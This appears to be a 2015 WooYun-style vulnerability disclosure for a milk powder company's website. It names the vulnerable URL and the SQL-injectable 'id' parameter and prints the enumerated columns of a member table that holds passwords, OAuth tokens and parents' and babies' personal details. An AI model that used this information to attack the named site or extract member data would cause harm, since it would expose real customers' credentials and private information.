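2015-11-03: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-12-18: The vendor has actively ignored the vulnerability; details disclosed to the public
Milk powder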
http://www.scient.com.cn/news/news.php?id=303
Injection point in the id parameter:
Table: member2013
[34 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| AddressInfo     | varchar(200) |
| BabyName        | varchar(50)  |
| BabyTran        | varchar(50)  |
| BirthDay        | varchar(50)  |
| CityAddress     | varchar(100) |
| CommandName     | varchar(50)  |
| Email           | varchar(100) |
| IP              | varchar(50)  |
| IPAddress       | varchar(100) |
| IsAcceptProduct | int(11)      |
| IsActiveEmail   | int(11)      |
| IsEnable        | int(11)      |
| IsSex           | int(11)      |
| LastDate        | datetime     |
| LoginName       | varchar(100) |
| LoginPwd        | varchar(100) |
| Member2013ID    | int(11)      |
| MemberTypeID    | int(11)      |
| Mobile          | varchar(50)  |
| NickName        | varchar(100) |
| NowSelPinPai    | varchar(50)  |
| OauthToken      | varchar(200) |
| OauthTokenSecre | varchar(200) |
| ParentName      | varchar(50)  |
| Phone           | varchar(50)  |
| RegDate         | datetime     |
| SelServices     | varchar(50)  |
| Tel             | varchar(50)  |
| UserCard        | varchar(100) |
| UserName        | varchar(100) |
| WeiboHead       | varchar(200) |
| WeiBoID         | varchar(100) |
| WeiboUrl        | varchar(200) |
| ZipCode         | varchar(50)  |
+-----------------+--------------+
Filter the input.
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 15 (WooYun rating)